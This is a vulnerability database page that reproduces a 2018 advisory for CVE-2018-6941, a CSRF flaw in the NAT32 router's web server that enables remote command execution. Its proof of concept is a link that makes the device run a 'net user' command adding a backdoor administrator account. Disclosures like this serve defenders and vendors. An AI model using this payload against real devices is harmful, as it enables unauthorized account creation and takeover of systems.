Vulners
Lucene search
NAT32 Build 22284 Remote Command Execution / CSRF
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | NAT32 2.2 Build 22284 - Cross-Site Request Forgery Vulnerability | 14 Feb 201800:00 | – | zdt |
 | NAT32 HTTPD Cross-Site Request Forgery Vulnerability | 2 Mar 201800:00 | – | cnvd |
 | CVE-2018-6941 | 20 Feb 201815:00 | – | cve |
 | CVE-2018-6941 | 20 Feb 201815:00 | – | cvelist |
 | NAT32 2.2 Build 22284 - Cross-Site Request Forgery | 14 Feb 201800:00 | – | exploitdb |
 | EUVD-2018-18685 | 7 Oct 202500:30 | – | euvd |
 | NAT32 2.2 Build 22284 - Cross-Site Request Forgery | 14 Feb 201800:00 | – | exploitpack |
 | CVE-2018-6941 | 20 Feb 201815:29 | – | nvd |
 | CVE-2018-6941 | 20 Feb 201815:29 | – | osv |
 | Cross site request forgery (csrf) | 20 Feb 201815:29 | – | prion |
10
`[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/NAT32-REMOTE-COMMAND-EXECUTION-CSRF-CVE-2018-6941.txt
[+] ISR: Apparition Security
[-_-] D1rty0tis
Vendor:
=============
www.nat32.com
Product:
===========
NAT32 Build (22284)
NAT32(r) is a versatile IP Router implemented as a WIN32 application.
Vulnerability Type:
===================
Remote Command Execution (CSRF)
CVE Reference:
==============
CVE-2018-6941
Security Issue:
================
CSRF issue exists in the HTTPD component of NAT32 v2.2 Build 22284 devices that can be exploited for Remote Code Execution.
Remote attackers can potentially execute arbitrary System Commands due to a Cross Site Request Forgery, if an authenticated NAT32 user clicks a malicious link
or visits an attacker controlled webpage as NAT32 performs no check for blind requests.
Its also worth mentioning is NAT32 implements BASIC authentication which pass BASE64 Encoded credentials which can be easily revealed if sniffed on network.
Exploit/POC:
=============
<a href="http://VICTIM-IP:8080/shell?cmd=exec+net%20user%20HACKER%20abc123%20/add">Backdoor clicker</a>
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=============================
Vendor Notification: February 9, 2018
Vendor acknowledgement: February 9, 2018
Vendor "I've decided to remove the HTTPD code from Build 22284 of NAT32" : February 12, 2018
www.nat32.com website reads "NAT32 Version 2.2 Build 22284 is temporarily unavailable." : February 13, 2018
February 14, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Feb 2018 00:00Current
8.7High risk
Vulners AI Score8.7
EPSS0.02547